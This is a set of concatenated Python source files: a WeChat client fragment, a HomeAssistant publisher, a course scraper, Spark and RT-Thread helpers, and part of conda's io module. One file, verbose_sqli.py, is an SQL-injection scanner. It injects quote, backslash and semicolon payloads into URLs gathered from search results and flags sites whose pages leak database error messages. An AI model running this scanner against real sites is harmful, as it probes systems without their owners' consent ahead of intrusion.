if arg == 'all': # 忽略掉所有消息
print(tdtr("确认忽略所有未读消息吗?y or n"))
res = td_input()
if res == 'y' or res == 'yes':
# 忽略所有
for user in self.getUsers():
user.msgs.clear()
else:
return
else:
try:
uid = int(arg)
except Exception :
print(tdtr("参数错误,请重试"))
return
if uid not in self.user_dict:
print(tdtr("参数错误,请重试"))
return
self.getUserByID(uid).msgs.clear()
@itchat.msg_register([TEXT, MAP, CARD, NOTE, SHARING,PICTURE, RECORDING, ATTACHMENT, VIDEO], isGroupChat=True)
def recv_group_msg(msg):
'''
获取到群聊发送来的消息
'''
Users.instance().handelMsg(msg,'r')
@itchat.msg_register([TEXT, MAP, CARD, NOTE, SHARING,PICTURE, RECORDING, ATTACHMENT, VIDEO], isGroupChat=False) # 注册消息,如果有消息收到,执行此函数。
def recv_msg(msg):
'''
获取到好友发送来的消息
'''
Users.instance().handelMsg(msg,'u')
@register_func(CmdType.CMD_UP)
def up():
'''
按下了↑按键,显示历史列表中的上一条记录
'''
m = list(history.previous())
set_msg(m)
set_index(len(m))
td_flush(m)
@register_func(CmdType.CMD_DOWN)
def down():
'''
按下了↓按键,显示历史列表中的下一条记录
'''
m = list(history.next())
set_msg(m)
set_index(len(m))
td_flush(m) |
HASSStatus.py | # HomeAssistant Status Output
# Publishes the provided sensor key and value pair to a HomeAssistant instance
import logging
from ww import f
logger = logging.getLogger(__name__.rsplit(".")[-1])
class HASSStatus:
import time
import threading
import requests
apiKey = None
config = None
configConfig = None
configHASS = None
master = None
msgRateInSeconds = 60
resendRateInSeconds = 3600
retryRateInSeconds = 60
msgQueue = {}
status = False
serverIP = None
serverPort = 8123
useHttps = False
timeout = 2
backgroundTasksLock = threading.Lock()
backgroundTasksThread = None
def __init__(self, master):
self.config = master.config
self.master = master
try:
self.configConfig = self.config["config"]
except KeyError:
self.configConfig = {}
try:
self.configHASS = self.config["status"]["HASS"]
except KeyError:
self.configHASS = {}
self.status = self.configHASS.get("enabled", False)
self.serverIP = self.configHASS.get("serverIP", None)
self.serverPort = self.configHASS.get("serverPort", 8123)
self.useHttps = self.configHASS.get("useHttps", False)
self.apiKey = self.configHASS.get("apiKey", None)
self.msgRateInSeconds = self.configHASS.get("msgRateInSeconds", 60)
self.resendRateInSeconds = self.configHASS.get("resendRateInSeconds", 3600)
self.retryRateInSeconds = self.configHASS.get("retryRateInSeconds", 60)
# Unload if this module is disabled or misconfigured
if (
(not self.status)
or (not self.serverIP)
or (int(self.serverPort) < 1)
or (not self.apiKey)
):
self.master.releaseModule("lib.TWCManager.Status", "HASSStatus")
else:
self.backgroundTasksThread = self.threading.Thread(
target=self.background_task_thread, args=()
)
self.backgroundTasksThread.daemon = True
self.backgroundTasksThread.start()
def getTwident(self, twcid):
# Format TWCID nicely
if len(twcid) == 2:
return "%02X%02X" % (twcid[0], twcid[1])
else:
return str(twcid.decode("utf-8"))
def background_task_thread(self):
while True:
self.time.sleep(self.msgRateInSeconds)
self.backgroundTasksLock.acquire()
for msgKey in self.msgQueue:
msg = self.msgQueue[msgKey]
if msg.elapsingTime < self.time.time():
self.sendingStatusToHASS(msg)
self.backgroundTasksLock.release()
def getSensorName(self, twcid, key_underscore):
return "sensor.twcmanager_" + str(self.getTwident(twcid)) + "_" + key_underscore
def setStatus(self, twcid, key_underscore, key_camelcase, value, unit):
self.backgroundTasksLock.acquire()
sensor = self.getSensorName(twcid, key_underscore)
if (sensor not in self.msgQueue) or (self.msgQueue[sensor].value != value):
self.msgQueue[sensor] = HASSMessage(
self.time.time(),
sensor,
twcid,
key_underscore,
key_camelcase,
value,
unit,
)
self.backgroundTasksLock.release()
def sendingStatusToHASS(self, msg):
http = "http://" if not (self.useHttps) else "https://"
url = http + self.serverIP + ":" + self.serverPort
url = url + "/api/states/" + msg.sensor
headers = {
"Authorization": "Bearer " + self.apiKey,
"content-type": "application/json",
}
try:
logger.log(
logging.INFO8,
f(
"Sending POST request to HomeAssistant for sensor {msg.sensor} (value {msg.value})."
),
)
devclass = ""
if str.upper(msg.unit) in ["W", "A", "V", "KWH"]:
devclass = "power"
if len(msg.unit) > 0:
self.requests.post(
url,
json={
"state": msg.value,
"attributes": {
"unit_of_measurement": msg.unit,
"device_class": devclass,
"friendly_name": "TWC "
+ str(self.getTwident(msg.twcid))
+ " "
+ msg.key_camelcase,
},
},
timeout=self.timeout,
headers=headers,
)
else:
self.requests.post(
url,
json={
"state": msg.value,
"attributes": {
"friendly_name": "TWC "
+ str(self.getTwident(msg.twcid))
+ " "
+ msg.key_camelcase
},
},
timeout=self.timeout,
headers=headers,
)
# Setting elapsing time to now + resendRateInSeconds
self.msgQueue[msg.sensor].elapsingTime = (
self.time.time() + self.resendRateInSeconds
)
except self.requests.exceptions.ConnectionError as e:
logger.log(
logging.INFO4,
"Error connecting to HomeAssistant to publish sensor values",
)
logger.debug(str(e))
self.settingRetryRate(msg)
return False
except self.requests.exceptions.ReadTimeout as e:
logger.log(
logging.INFO4,
"Error connecting to HomeAssistant to publish sensor values",
)
logger.debug(str(e))
self.settingRetryRate(msg)
return False
except Exception as e:
logger.log(
logging.INFO4, "Error during publishing HomeAssistant sensor values"
)
logger.debug(str(e))
self.settingRetryRate(msg)
return False
def settingRetryRate(self, msg):
# Setting elapsing time to now + retryRateInSeconds
self.msgQueue[msg.sensor].elapsingTime = (
self.time.time() + self.retryRateInSeconds
)
class HASSMessage:
elapsingTime = 0
sensor = ""
twcid = ""
key_underscore = ""
key_camelcase = ""
value = None
unit = ""
def __init__(
self, elapsingTime, sensor, twcid, key_underscore, key_camelcase, value, unit
):
self.elapsingTime = elapsingTime
self.sensor = sensor
self.twcid = twcid
self.key_underscore = key_underscore
self.key_camelcase = key_camelcase
self.value = value
self.unit = unit
|
courses.py | import re
from collections import OrderedDict
from datetime import datetime
from threading import Thread
import requests
from bs4 import BeautifulSoup
from data_parser.base_parser import BaseParser
from validations.schemas.courses_schema import CoursesSchema
class CoursesParser(BaseParser):
link = "https://coursefinder.utoronto.ca/course-search/search"
def __init__(self):
super().__init__(
file="../nikel-datasets/data/courses.json",
schema=CoursesSchema
)
def fill_queue(self):
course_links = self.extract_courses_links()
for link in course_links:
self.queue.put(link)
# This is a complete mess and many crimes have been committed. Will fix later
def process(self):
# unique_labels = []
courses = []
while not self.queue.empty():
link = self.queue.get()
self.thread_print(f"{self.queue.qsize()} Left: {link}")
while True:
try:
page = requests.get(link)
break
except:
pass
parsed_page = BeautifulSoup(page.content, "lxml")
inner_page = parsed_page.find("div", id="correctPage")
if inner_page is None:
self.queue.task_done()
continue
# Used for generating new labels
# labels = inner_page.find_all("label")
# for label in labels:
# if label.text not in unique_labels:
# unique_labels.append(label.text)
# print(label.text, link)
title = inner_page.find("span",
{"class": "uif-headerText-span"}).text
title_parse = re.search(r"(.*?): (.*)", title)
course_id = link.rsplit('/', 1)[-1]
course_code = title_parse.group(1)
course_name = title_parse.group(2)
division = self.process_field(inner_page, "u23")
description = self.process_field(inner_page, "u32")
department = self.process_field(inner_page, "u41")
prerequisites = self.process_field(inner_page, "u50")
corequisites = self.process_field(inner_page, "u59")
exclusions = self.process_field(inner_page, "u68")
recommended_preparation = self.process_field(inner_page, "u77")
level = self.process_field(inner_page, "u86")
campus = self.process_field(inner_page, "u149")
term = self.process_field(inner_page, "u158")
arts_and_science_breadth = self.process_field(inner_page, "u122")
arts_and_science_distribution = self.process_field(inner_page,
"u131")
utm_distribution = self.process_field(inner_page, "u113")
utsc_breadth = self.process_field(inner_page, "u104")
apsc_electives = self.process_field(inner_page, "u140")
# Make use of cobalt's scraper code since
# I don't have the time to write brand new
# custom code that's error tolerant.
meeting_table = inner_page.find("table", id="u172")
rows = []
if meeting_table:
rows = meeting_table.find_all("tr")
sections = []
for row in rows:
tds = row.find_all("td")
if not tds:
continue
meeting_code = tds[0].text.strip()
raw_times = tds[1].get_text().replace(
"Alternate week", "").strip().split(" ")
times = []
for j in range(0, len(raw_times) - 1, 2):
times.append(raw_times[j] + " " + raw_times[j + 1])
instructors = BeautifulSoup(str(tds[2]).replace("<br>", "\n"),
"lxml")
instructors = instructors.get_text().split("\n")
instructors = list(
filter(None, [x.strip() for x in instructors]))
raw_locations = tds[3].get_text().strip().split(" ")
locations = []
for j in range(0, len(raw_locations) - 1, 2):
locations.append(
raw_locations[j] + " " + raw_locations[j + 1])
try:
class_size = int(tds[4].get_text().strip())
except:
class_size = None
try:
current_enrollment = int(tds[5].get_text().strip())
except:
current_enrollment = None
try:
option_to_waitlist = tds[6].find("img", {
"src": "../courseSearch/images/checkmark.png"}) is not None
except:
option_to_waitlist = None
try:
delivery_mode = tds[7].text.strip().lower()
except:
delivery_mode = None
time_data = []
for j in range(len(times)):
info = times[j].split(" ")
day = info[0].lower()
hours = info[1].split("-")
try:
location = locations[j]
except:
location = None
for j in range(len(hours)):
x = hours[j].split(':')
hours[j] = (60 * 60 * int(x[0])) + (int(x[1]) * 60)
time_data.append(OrderedDict([
("day", day),
("start", hours[0]),
("end", hours[1]),
("duration", hours[1] - hours[0]),
("location", location)
]))
data = OrderedDict([
("code", meeting_code),
("instructors", instructors),
("times", time_data),
("size", class_size),
("enrollment", current_enrollment),
("waitlist_option", option_to_waitlist),
("delivery", delivery_mode)
])
sections.append(data)
date = datetime.now()
courses.append(OrderedDict([
("id", course_id),
("code", course_code),
("name", course_name),
("description", description),
("division", division),
("department", department),
("prerequisites", prerequisites),
("corequisites", corequisites),
("exclusions", exclusions),
("recommended_preparation", recommended_preparation),
("level", level),
("campus", campus),
("term", term),
("arts_and_science_breadth", arts_and_science_breadth),
("arts_and_science_distribution",
arts_and_science_distribution),
("utm_distribution", utm_distribution),
("utsc_breadth", utsc_breadth),
("apsc_electives", apsc_electives),
("meeting_sections", sections),
("last_updated", date.isoformat()),
]))
self.queue.task_done()
self.result_queue.put(courses)
def clean_up(self):
while not self.result_queue.empty():
courses = self.result_queue.get()
for course in courses:
self.add_item(course)
@staticmethod
def process_field(page, id: str):
field = page.find("span", id=id)
if field:
field = field.text.strip()
if not field:
field = None
return field
def extract_courses_links(self):
courses = []
sess = requests.Session()
# set cookies
sess.get(
f"{CoursesParser.link}/courseSearch?viewId=CourseSearch-FormView&methodToCall=start#search")
resp = sess.get(
f"{CoursesParser.link}/courseSearch/course/search"
f"?queryText=&requirements=&campusParam=St.%20George,Scarborough,Mississauga"
).json()
for course in resp["aaData"]:
link = BeautifulSoup(course[1], 'html.parser')
courses.append(f'{CoursesParser.link}/{link.find("a")["href"]}')
return courses
if __name__ == "__main__":
p = CoursesParser()
p.load_file()
p.fill_queue()
for i in range(p.threads):
t = Thread(target=p.process, args=())
t.start()
p.queue.join()
p.clean_up()
p.dump_file()
p.thread_print(f"Validating {p.file}...")
p.validate_dump()
|
spark.py | import threading
from pyspark import SparkContext
from pyspark.streaming import StreamingContext
from src.putils import pretty_print
class Spark:
def __init__(self):
self.sc = SparkContext(appName="SparkSIFTCounter")
self.sc.setLogLevel('ERROR')
self.streaming_sc = StreamingContext(self.sc, 1)
self.streaming_sc.checkpoint('checkpoint')
def create(self, stream_dir, converter, function, sift, log=None):
images = self.streaming_sc.textFileStream(stream_dir)
aggr = sift.save
if function == 'save':
aggr = sift.save
if function == 'filter':
aggr = sift.filter
if function == 'count':
aggr = sift.count
stream = images.map(converter).map(aggr)
if function == 'count':
def avg(x, y):
return (x + y) / 2
stream = stream.reduceByKeyAndWindow(avg, lambda x, y: x - y, 30,
3)
pretty_print(stream)
stream.saveAsTextFiles(log)
thread = threading.Thread(target=Spark.pending, args=(self, ))
thread.daemon = True
thread.start()
def pending(self):
self.streaming_sc.start()
self.streaming_sc.awaitTermination()
|
verbose_sqli.py | import os
import re
from queue import Queue
from urllib.parse import urlparse
from threading import Thread
import requests
import threading
from requests import get
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
lock = threading.Lock()
ERRORS = [r'\[(ODBC SQL Server Driver|SQL Server)\]', r'mysql_fetch_assoc',
r'You have an error in your SQL syntax;',
r'A syntax error has occurred', r'ADODB.Field error', r'ASP.NET is configured to show verbose error messages',
r'ASP.NET_SessionId', r'Active Server Pages error', r'An illegal character has been found in the statement',
r'An unexpected token "END-OF-STATEMENT" was found', r'CLI Driver', r'Can\'t connect to local', r'Custom Error Message',
r'DB2 Driver', r'DB2 Error', r'DB2 ODBC', r'Died at', r'Disallowed Parent Path', r'Error Diagnostic Information',
r'Error Message : Error loading required libraries.', r'Error Report', r'Error converting data type varchar to numeric',
r'Incorrect syntax near',r'Invalid procedure call or argument', r'Invision Power Board Database Error', r'JDBC Driver', r'JDBC Error', r'JDBC MySQL',
r'JDBC Oracle', r'JDBC SQL', r'Microsoft OLE DB Provider for ODBC Drivers', r'Microsoft VBScript compilation error',
r'Microsoft VBScript error', r'MySQL Driver', r'MySQL Error', r'MySQL ODBC', r'ODBC DB2', r'ODBC Driver', r'ODBC Error',
r'ODBC Microsoft Access', r'ODBC Oracle', r'ODBC SQL', r'ODBC SQL Server', r'OLE/DB provider returned message',
r'ORA-0', r'ORA-1', r'Oracle DB2', r'Oracle Driver', r'Oracle Error', r'Oracle ODBC', r'PHP Error',
r'PHP Parse error', r'PHP Warning', r'Parent Directory', r'Permission denied: \'GetObject\'',
r'PostgreSQL query failed: ERROR: parser: parse error', r'SQL Server Driver\]\[SQL Server', r'SQL command not properly ended',
r'SQLException', r'Supplied argument is not a valid PostgreSQL result', r'Syntax error in query expression', r'The error occurred in',
r'The script whose uid is', r'Type mismatch', r'Unable to jump to row', r'Unclosed quotation mark before the character string',
r'Unterminated string constant', r'Warning: Cannot modify header information - headers already sent',
r'Warning: Supplied argument is not a valid File-Handle resource in', r'Warning: mysql_query()',
r'Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL', r'You have an error in your SQL syntax near',
r'data source=', r'detected an internal error \[IBM\]\[CLI Driver\]\[DB2/6000\]', r'include_path', r'invalid query',
r'is not allowed to access', r'missing expression', r'mySQL error with query', r'mysql error', r'on MySQL result index',
r'supplied argument is not a valid MySQL result resource', r'unexpected end of SQL command']
ERROR_RGX = [re.compile(error, re.IGNORECASE) for error in ERRORS]
class Sqli_Finder():
def __init__(self, filename):
self.filename = filename
self.urls = self.sqli_f()
@staticmethod
def banner():
os.system('clear')
print("\n")
print(" █████╗ ███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
print("██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
print("███████║██╔██╗ ██║███████║██████╔╝██║ ██║ ██║██║ ██║█████╗ ██████╔╝")
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║ ██║ ██║██║ ██║██╔══╝ ██╔══██╗")
print("██║ ██║██║ ╚████║██║ ██║██║ ██║╚██████╗╚██████╔╝██████╔╝███████╗██║ ██║")
print("╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝")
print(" Verbose SQLi Plugin - anarcoder at protonmail.com\n")
def remove_duplicate_targets(self):
results = [line.rstrip('\n') for line in open(self.filename)]
url_lists = []
path_list = []
for url in results:
try:
urlp = urlparse(url)
path = urlp.scheme + '://' + urlp.netloc + urlp.path
if path not in path_list:
urlp = urlp.scheme + '://' + urlp.netloc + urlp.path + '?' + urlp.query
url_lists.append(urlp)
path_list.append(path)
except Exception as e:
pass
url_lists = set(url_lists)
url_lists = list(url_lists)
return url_lists
def insert_payloads(self, url_list):
ret_list = []
payloads = ["'","\\",";"]
try:
for url in url_list:
urlq = urlparse(url)
for par in urlq.query.split("&"):
for pay in payloads:
ret_list.append(url.replace(par,par+pay))
except:
pass
return ret_list
def check_vuln(self, q):
while True:
#with lock:
url = q.get()
headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; '
'Linux x86_64; rv:41.0) Gecko/20100101 '
'Firefox/41.0'}
with open('sqli_sites.txt', 'a+') as f:
try:
req = get(url, headers=headers, verify=False, timeout=25)
for error in ERROR_RGX:
match = error.search(req.content.decode('latin-1'))
if match:
f.write(url + '\n')
match_res = match.group(0)
print('[+] {0} \033[31mPossible Vulnerable!!\033[33m error exposed..\033[39m'.format(url))
except Exception as e:
q.task_done()
q.task_done()
def sqli_f(self):
self.banner()
# Removing duplicate targets
url_lists = self.remove_duplicate_targets()
pay_list = self.insert_payloads(url_lists)
print(len(pay_list))
# My Queue
q = Queue(maxsize=0)
# Number of threads
num_threads = 10
for url in pay_list:
q.put(url)
# My threads
print('[+] Trying targets.. possible vulnerable will be saved in sqli_sites.txt.. ')
print('[*] Starting evil threads =)...\n')
for i in range(num_threads):
worker = Thread(target=self.check_vuln, args=(q,))
worker.setDaemon(True)
worker.start()
q.join()
def main():
filename = 'results_google_search.txt'
Sqli_Finder(filename)
if __name__ == '__main__':
main()
|
init_env.py | # -*- coding:utf-8 -*-
#
# File : env.py
# This file is part of RT-Thread RTOS
# COPYRIGHT (C) 2006 - 2019, RT-Thread Development Team
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Change Logs:
# Date Author Notes
# 2019-8-26 SummerGift first version
#
from multiprocessing import Process
import os
import sys
def run_proc(name, env_root):
exec_file = os.path.join(env_root, "tools\scripts\env.py")
log_std = os.path.join(env_root, "env_log_std")
log_err = os.path.join(env_root, "env_log_err")
try:
os.system("python {0} package --upgrade 1>{1} 2>{2}".format(exec_file, log_std, log_err))
except Exception as e:
print("Auto upgrade failed, please check your network.")
sys.eixt(1)
def main():
env_root = os.getenv("ENV_ROOT")
p = Process(target=run_proc, args=('upgrade', env_root))
p.start()
p.join()
if __name__=='__main__':
main()
|
io.py | # -*- coding: utf-8 -*-
# Copyright (C) 2012 Anaconda, Inc
# SPDX-License-Identifier: BSD-3-Clause
from __future__ import absolute_import, division, print_function, unicode_literals
from collections import defaultdict
from concurrent.futures import ProcessPoolExecutor, ThreadPoolExecutor, Executor, Future, _base, as_completed # NOQA
from concurrent.futures.thread import _WorkItem
from contextlib import contextmanager
from enum import Enum
from errno import EPIPE, ESHUTDOWN
from functools import partial, wraps
import sys
if sys.version_info[0] > 2:
# Not used at present.
from io import BytesIO
from itertools import cycle
import json
import logging # lgtm [py/import-and-import-from]
from logging import CRITICAL, Formatter, NOTSET, StreamHandler, WARN, getLogger
import os
from os.path import dirname, isdir, isfile, join
import signal
from threading import Event, Thread, Lock
from time import sleep, time
from .compat import StringIO, iteritems, on_win, encode_environment
from .constants import NULL
from .path import expand
from .._vendor.auxlib.decorators import memoizemethod
from .._vendor.auxlib.logz import NullHandler
from .._vendor.auxlib.type_coercion import boolify
from .._vendor.tqdm import tqdm
log = getLogger(__name__)
class DeltaSecondsFormatter(Formatter):
"""
Logging formatter with additional attributes for run time logging.
Attributes:
`delta_secs`:
Elapsed seconds since last log/format call (or creation of logger).
`relative_created_secs`:
Like `relativeCreated`, time relative to the initialization of the
`logging` module but conveniently scaled to seconds as a `float` value.
"""
def __init__(self, fmt=None, datefmt=None):
self.prev_time = time()
super(DeltaSecondsFormatter, self).__init__(fmt=fmt, datefmt=datefmt)
def format(self, record):
now = time()
prev_time = self.prev_time
self.prev_time = max(self.prev_time, now)
record.delta_secs = now - prev_time
record.relative_created_secs = record.relativeCreated / 1000
return super(DeltaSecondsFormatter, self).format(record)
if boolify(os.environ.get('CONDA_TIMED_LOGGING')):
_FORMATTER = DeltaSecondsFormatter(
"%(relative_created_secs) 7.2f %(delta_secs) 7.2f "
"%(levelname)s %(name)s:%(funcName)s(%(lineno)d): %(message)s"
)
else:
_FORMATTER = Formatter(
"%(levelname)s %(name)s:%(funcName)s(%(lineno)d): %(message)s"
)
def dashlist(iterable, indent=2):
return ''.join('\n' + ' ' * indent + '- ' + str(x) for x in iterable)
class ContextDecorator(object):
"""Base class for a context manager class (implementing __enter__() and __exit__()) that also
makes it a decorator.
"""
# TODO: figure out how to improve this pattern so e.g. swallow_broken_pipe doesn't have to be instantiated # NOQA
def __call__(self, f):
@wraps(f)
def decorated(*args, **kwds):
with self:
return f(*args, **kwds)
return decorated
class SwallowBrokenPipe(ContextDecorator):
# Ignore BrokenPipeError and errors related to stdout or stderr being
# closed by a downstream program.
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
if (exc_val
and isinstance(exc_val, EnvironmentError)
and getattr(exc_val, 'errno', None)
and exc_val.errno in (EPIPE, ESHUTDOWN)):
return True
swallow_broken_pipe = SwallowBrokenPipe()
class CaptureTarget(Enum):
"""Constants used for contextmanager captured.
Used similarly like the constants PIPE, STDOUT for stdlib's subprocess.Popen.
"""
STRING = -1
STDOUT = -2
@contextmanager
def env_vars(var_map=None, callback=None, stack_callback=None):
if var_map is None:
var_map = {}
new_var_map = encode_environment(var_map)
saved_vars = {}
for name, value in iteritems(new_var_map):
saved_vars[name] = os.environ.get(name, NULL)
os.environ[name] = value
try:
if callback:
callback()
if stack_callback:
stack_callback(True)
yield
finally:
for name, value in iteritems(saved_vars):
if value is NULL:
del os.environ[name]
else:
os.environ[name] = value
if callback:
callback()
if stack_callback:
stack_callback(False)
@contextmanager
def env_var(name, value, callback=None, stack_callback=None):
# Maybe, but in env_vars, not here:
# from conda.compat import ensure_fs_path_encoding
# d = dict({name: ensure_fs_path_encoding(value)})
d = {name: value}
with env_vars(d, callback=callback, stack_callback=stack_callback) as es:
yield es
@contextmanager
def env_unmodified(callback=None):
with env_vars(callback=callback) as es:
yield es
@contextmanager
def captured(stdout=CaptureTarget.STRING, stderr=CaptureTarget.STRING):
"""Capture outputs of sys.stdout and sys.stderr.
If stdout is STRING, capture sys.stdout as a string,
if stdout is None, do not capture sys.stdout, leaving it untouched,
otherwise redirect sys.stdout to the file-like object given by stdout.
Behave correspondingly for stderr with the exception that if stderr is STDOUT,
redirect sys.stderr to stdout target and set stderr attribute of yielded object to None.
Args:
stdout: capture target for sys.stdout, one of STRING, None, or file-like object
stderr: capture target for sys.stderr, one of STRING, STDOUT, None, or file-like object
Yields:
CapturedText: has attributes stdout, stderr which are either strings, None or the
corresponding file-like function argument.
"""
# NOTE: This function is not thread-safe. Using within multi-threading may cause spurious
# behavior of not returning sys.stdout and sys.stderr back to their 'proper' state
# """
# Context manager to capture the printed output of the code in the with block
#
# Bind the context manager to a variable using `as` and the result will be
# in the stdout property.
#
# >>> from conda.common.io import captured
# >>> with captured() as c:
# ... print('hello world!')
# ...
# >>> c.stdout
# 'hello world!\n'
# """
def write_wrapper(self, to_write):
# This may have to deal with a *lot* of text.
if hasattr(self, 'mode') and 'b' in self.mode:
wanted = bytes
elif sys.version_info[0] == 3 and isinstance(self, BytesIO):
wanted = bytes
else:
# ignore flake8 on this because it finds an error on py3 even though it is guarded
if sys.version_info[0] == 2:
wanted = unicode # NOQA
else:
wanted = str
if not isinstance(to_write, wanted):
if hasattr(to_write, 'decode'):
decoded = to_write.decode('utf-8')
self.old_write(decoded)
elif hasattr(to_write, 'encode'):
b = to_write.encode('utf-8')
self.old_write(b)
else:
self.old_write(to_write)
class CapturedText(object):
pass
# sys.stdout.write(u'unicode out')
# sys.stdout.write(bytes('bytes out', encoding='utf-8'))
# sys.stdout.write(str('str out'))
saved_stdout, saved_stderr = sys.stdout, sys.stderr
if stdout == CaptureTarget.STRING:
outfile = StringIO()
outfile.old_write = outfile.write
outfile.write = partial(write_wrapper, outfile)
sys.stdout = outfile
else:
outfile = stdout
if outfile is not None:
sys.stdout = outfile
if stderr == CaptureTarget.STRING:
errfile = StringIO()
errfile.old_write = errfile.write
errfile.write = partial(write_wrapper, errfile)
sys.stderr = errfile
elif stderr == CaptureTarget.STDOUT:
sys.stderr = errfile = outfile
else:
errfile = stderr
if errfile is not None:
sys.stderr = errfile
c = CapturedText()
log.info("overtaking stderr and stdout")
try:
yield c
finally:
if stdout == CaptureTarget.STRING:
c.stdout = outfile.getvalue()
else:
c.stdout = outfile
if stderr == CaptureTarget.STRING:
c.stderr = errfile.getvalue()
elif stderr == CaptureTarget.STDOUT:
c.stderr = None
else:
c.stderr = errfile
sys.stdout, sys.stderr = saved_stdout, saved_stderr
log.info("stderr and stdout yielding back")
@contextmanager
def argv(args_list):
saved_args = sys.argv
sys.argv = args_list
try:
yield
finally:
sys.argv = saved_args
@contextmanager
def _logger_lock():
logging._acquireLock()
try:
yield
finally:
logging._releaseLock()
@contextmanager
def disable_logger(logger_name):
logr = getLogger(logger_name)
_lvl, _dsbld, _prpgt = logr.level, logr.disabled, logr.propagate
null_handler = NullHandler()
with _logger_lock():
logr.addHandler(null_handler)
logr.setLevel(CRITICAL + 1)
logr.disabled, logr.propagate = True, False
try:
yield
finally:
with _logger_lock():
logr.removeHandler(null_handler) # restore list logr.handlers
logr.level, logr.disabled = _lvl, _dsbld
logr.propagate = _prpgt
@contextmanager
def stderr_log_level(level, logger_name=None):
logr = getLogger(logger_name)
_hndlrs, _lvl, _dsbld, _prpgt = logr.handlers, logr.level, logr.disabled, logr.propagate
handler = StreamHandler(sys.stderr)
handler.name = 'stderr'
handler.setLevel(level)
handler.setFormatter(_FORMATTER)
with _logger_lock():
logr.setLevel(level)
logr.handlers, logr.disabled, logr.propagate = [], False, False
logr.addHandler(handler)
logr.setLevel(level)
try:
yield
finally:
with _logger_lock():
logr.handlers, logr.level, logr.disabled = _hndlrs, _lvl, _dsbld
logr.propagate = _prpgt
def attach_stderr_handler(level=WARN, logger_name=None, propagate=False, formatter=None):
# get old stderr logger
logr = getLogger(logger_name)
old_stderr_handler = next((handler for handler in logr.handlers if handler.name == 'stderr'),
None)
# create new stderr logger
new_stderr_handler = StreamHandler(sys.stderr)
new_stderr_handler.name = 'stderr'
new_stderr_handler.setLevel(NOTSET)
new_stderr_handler.setFormatter(formatter or _FORMATTER)
# do the switch
with _logger_lock():
if old_stderr_handler:
logr.removeHandler(old_stderr_handler)
logr.addHandler(new_stderr_handler)
logr.setLevel(level)
logr.propagate = propagate
def timeout(timeout_secs, func, *args, **kwargs):
"""Enforce a maximum time for a callable to complete.
Not yet implemented on Windows.
"""
default_return = kwargs.pop('default_return', None)
if on_win:
# Why does Windows have to be so difficult all the time? Kind of gets old.
# Guess we'll bypass Windows timeouts for now.
try:
return func(*args, **kwargs)
except KeyboardInterrupt: # pragma: no cover
return default_return
else:
class TimeoutException(Exception):
pass
def interrupt(signum, frame):
raise TimeoutException()
signal.signal(signal.SIGALRM, interrupt)
signal.alarm(timeout_secs)
try:
ret = func(*args, **kwargs)
signal.alarm(0)
return ret
except (TimeoutException, KeyboardInterrupt): # pragma: no cover
return default_return
class Spinner(object):
"""
Args:
message (str):
A message to prefix the spinner with. The string ': ' is automatically appended.
enabled (bool):
If False, usage is a no-op.
json (bool):
If True, will not output non-json to stdout.
"""
# spinner_cycle = cycle("⠋⠙⠹⠸⠼⠴⠦⠧⠇⠏")
spinner_cycle = cycle('/-\\|')
def __init__(self, message, enabled=True, json=False):
self.message = message
self.enabled = enabled
self.json = json
self._stop_running = Event()
self._spinner_thread = Thread(target=self._start_spinning)
self._indicator_length = len(next(self.spinner_cycle)) + 1
self.fh = sys.stdout
self.show_spin = enabled and not json and hasattr(self.fh, "isatty") and self.fh.isatty()
def start(self):
if self.show_spin:
self._spinner_thread.start()
elif not self.json:
self.fh.write("...working... ")
self.fh.flush()
def stop(self):
if self.show_spin:
self._stop_running.set()
self._spinner_thread.join()
self.show_spin = False
def _start_spinning(self):
try:
while not self._stop_running.is_set():
self.fh.write(next(self.spinner_cycle) + ' ')
self.fh.flush()
sleep(0.10)
self.fh.write('\b' * self._indicator_length)
except EnvironmentError as e:
if e.errno in (EPIPE, ESHUTDOWN):
self.stop()
else:
raise
@swallow_broken_pipe
def __enter__(self):
if not self.json:
sys.stdout.write("%s: " % self.message)
sys.stdout.flush()
self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
if not self.json:
with swallow_broken_pipe:
if exc_type or exc_val:
sys.stdout.write("failed\n")
else:
sys.stdout.write("done\n")
sys.stdout.flush()
class ProgressBar(object):
def __init__(self, description, enabled=True, json=False):
"""
Args:
description (str):
The name of the progress bar, shown on left side of output.
enabled (bool):
If False, usage is a no-op.
json (bool):
If true, outputs json progress to stdout rather than a progress bar.
Currently, the json format assumes this is only used for "fetch", which
maintains backward compatibility with conda 4.3 and earlier behavior.
"""
self.description = description
self.enabled = enabled
self.json = json
if json:
pass
elif enabled:
bar_format = "{desc}{bar} | {percentage:3.0f}% "
try:
self.pbar = tqdm(desc=description, bar_format=bar_format, ascii=True, total=1,
file=sys.stdout)
except EnvironmentError as e:
if e.errno in (EPIPE, ESHUTDOWN):
self.enabled = False
else:
raise
def update_to(self, fraction):
try:
if self.json and self.enabled:
sys.stdout.write('{"fetch":"%s","finished":false,"maxval":1,"progress":%f}\n\0'
% (self.description, fraction))
elif self.enabled:
self.pbar.update(fraction - self.pbar.n)
except EnvironmentError as e:
if e.errno in (EPIPE, ESHUTDOWN):
self.enabled = False
else:
raise
def finish(self):
self.update_to(1)
@swallow_broken_pipe
def close(self):
if self.enabled and self.json:
sys.stdout.write('{"fetch":"%s","finished":true,"maxval":1,"progress":1}\n\0'
% self.description)
sys.stdout.flush()
elif self.enabled:
